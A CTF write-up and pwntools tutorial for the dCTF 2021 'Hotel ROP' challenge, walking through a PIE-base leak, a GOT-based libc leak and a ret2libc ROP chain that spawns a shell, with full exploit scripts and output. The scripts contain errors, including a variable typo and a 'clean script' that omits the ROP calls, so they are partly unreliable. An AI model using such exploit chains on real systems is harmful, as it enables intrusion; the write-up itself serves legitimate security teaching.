dCTF - Hotel ROP (pwn)

Table of Contents

This writeup will be more PwnTools-oriented since this writeup will also be cross-posted onto Pwntools Blog.

Today, we will be looking at a pwn challenge from dCTF 2021 which features ret2libc exploitation with a little twist of a PIE-enabled binary. The following PwnTools features will be introduced here:

  • pwnlib.rop to help us craft ROP chains
  • pwnlib.elf to make finding addresses quick and easy
  • and many more little modules from pwntools to help us pwn faster ~

Challenge Description

They say programmers’ dream is California. And because they need somewhere to stay, we’ve built a hotel!

Attachments: hotel_rop

Getting Started

For this challenge, we are provided with a binary and nothing else.

We quickly check the security features of the binary with checksec hotel_rop which returns

[*] '/media/sf_dabian/Challenges/dctf/pwn/hotel_rop'

    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled

As shown, PIE and NX is enabled. Let’s run the binary and check out what we are dealing with

➜ ./hotel_rop
Welcome to Hotel ROP, on main street 0x55e4cd29636d
You come here often?
I think you should come here more often.

As you can see, we are given a leak and an input. Let’s decompile and look at what’s going on behind the scenes.

int main()
  printf("Welcome to Hotel ROP, on main street %p\n", main);
  return 0;

int vuln()
  int result;
  char s[28];
  int v2;

  puts("You come here often?");
  fgets(s, 256, stdin);
  if ( v2 )
    result = puts("I think you should come here more often.");
    result = puts("Oh! You are already a regular visitor!");
  return result;

As you can see, we have a leak which points to main(), and we have a buffer overflow in vuln() as we are given 256 bytes of input into a variable that holds 28 bytes of data.

With this, it becomes rather apparent that we have to do a ret2libc in order to spawn a shell and win. However, since this binary is PIE enabled, we have to first calculate the PIE base.


Stage 1: Calculate PIE base

Since we know that our leak is the address of main(), we can easily calculate our offset with elf.sym.main and set it as the base_address by saving it to elf.address.

from pwn import *

p = process('./hotel_rop') # run the process
context.binary = elf = ELF('hotel_rop') # set elf and context
libc = elf.libc # set libc

with log.progress('Calculating PIE base'): # cool loading bar !
  p.recvuntil('main street ')
  mainleak = int(p.recvline().rstrip(b'\n'), 16)

  elf.address = mainleak - elf.sym.main # use elf to save find main address and save PIE base into elf.address
  with log.success('PIE base @ elf.address')


[x] Starting local process './hotel_rop'
[+] Starting local process './hotel_rop': pid 3631
[x] Calculating PIE base
[*] Leak of main: 0x5562e309d36d
[+] PIE base @ elf.address
[+] Calculating PIE base: Done

Running the script, we see that we successfully found PIE base.

Stage 2: Leak and calculate LIBC base

Since LIBC is ASLR-enabled, we also have to calculate the LIBC base. This means we will need a LIBC leak and we will do that in our rop.chain().

We will leak an address from the GOT which contains libc addresses, and from there, calculate our libc base address.

Let’s write our rop.chain(), but without having to find any gadgets or addresses ourselves!!

from pwn import *

p = process('./hotel_rop') # run the process
context.binary = elf = ELF('hotel_rop') # set elf and context
libc = elf.libc # set libc

with log.progress('Stage 1: Calculating PIE base'): # cool loading bar !
  p.recvuntil(b'main street ')
  mainleak = int(p.recvline().rstrip(b'\n'), 16)

  elf.address = mainleak - elf.sym.main # use elf to save find main address and save PIE base into elf.address
  log.success(f'Stage 1 DONE: PIE base @ {hex(elf.address)}')

with log.progress('Stage 2: leaking LIBC address and calculating LIBC base'):
  rop1 = ROP(elf) # set up rop chain
  rop1.puts(elf.got.puts) # print global offset table entry for puts
  rop1.main() # loop back to main

  p.sendline(flat({ 40: rop1.chain()})) # easily find offset in GDB

  pustgotleak = u64(p.recvline().strip(b'\n').ljust(8, b'\x00'))
  libc.address = putsgotleak - libc.sym.puts

  log.success(f'Stage 2 DONE: libc base @ {hex(libc.address)}')


[x] Starting local process './hotel_rop'
[+] Starting local process './hotel_rop': pid 4558

[x] Stage 1: Calculating PIE base
[+] PIE base @ 0x55c995a39000
[+] Stage 1: Calculating PIE base: Done

[x] Stage 2: leaking LIBC address and calculating LIBC base
[+] libc base @ 0x7f1ab1a60000
[+] Stage 2: leaking LIBC address and calculating LIBC base: Done

Success! Let’s proceed with the last part of our exploit.

Stage 3: Return 2 LIBC System!

Now we have all the pieces we need to return to libc. This is super simple with PwnTools as well, we simply need to look for our ‘/bin/sh’ string with libc.search() and call rop.system(binsh).

from pwn import *

p = process('./hotel_rop') # run the process
context.binary = elf = ELF('hotel_rop') # set elf and context
libc = elf.libc # set libc

with log.progress('Stage 1: Calculating PIE base'): # cool loading bar !
  p.recvuntil(b'main street ')
  mainleak = int(p.recvline().rstrip(b'\n'), 16)

  elf.address = mainleak - elf.sym.main # use elf to save find main address and save PIE base into elf.address
  log.success(f'PIE base @ {hex(elf.address)}')

with log.progress('Stage 2: leaking LIBC address and calculating LIBC base'):
  rop1 = ROP(elf) # set up rop chain
  rop1.puts(elf.got.puts) # print global offset table entry for puts
  rop1.main() # loop back to main

  p.sendline(flat({ 40: rop1.chain()})) # flat automatically packs your rop chain after specific offsets, i.e. 40 in this case by padding with cyclic

  putsgotleak = u64(p.recvline().strip(b'\n').ljust(8, b'\x00'))
  libc.address = putsgotleak - libc.sym.puts

  log.success(f'libc base @ {hex(libc.address)}')

with log.progress('Stage 3: Popping a shell!'):
  binsh = next(libc.search(b'/bin/sh')) # search for /bin/sh string in libc

  rop2 = ROP([libc, elf]) # making a new rop chain with our LIBC!
  rop2.system(binsh) # popping a shell...
  p.sendline(flat({40: rop2.chain()}))
  log.success(f'Enjoy your shell!')

p.clean() # remove all other binary output before popping shell, basically look better LOL


[x] Starting local process './hotel_rop'
[+] Starting local process './hotel_rop': pid 4784

[x] Stage 1: Calculating PIE base
[+] PIE base @ 0x5558d4611000
[+] Stage 1: Calculating PIE base: Done

[x] Stage 2: leaking LIBC address and calculating LIBC base
[+] libc base @ 0x7f4dca447000
[+] Stage 2: leaking LIBC address and calculating LIBC base: Done

[x] Stage 3: Popping a shell!
[+] Enjoy your shell!
[+] Stage 3: Popping a shell!: Done

[*] Switching to interactive mode

$ id
uid=0(root) gid=0(root) groups=0(root)

$ whoami

With that, we successfully popped a shell and pwned the binary!

Clean Script

from pwn import *

p = process('./hotel_rop')
context.binary = elf = ELF('hotel_rop')
libc = elf.libc

p.recvuntil(b'main street ')
mainleak = int(p.recvline().rstrip(b'\n'), 16)
elf.address = mainleak - elf.sym.main

rop1 = ROP(elf)
p.sendline(flat({ 40: rop1.chain()}))

putsgotleak = u64(p.recvline().strip(b'\n').ljust(8, b'\x00'))
libc.address = putsgotleak - libc.sym.puts
binsh = next(libc.search(b'/bin/sh'))

rop2 = ROP([libc, elf])
p.sendline(flat({40: rop2.chain()}))
log.success(f'Enjoy your shell!')


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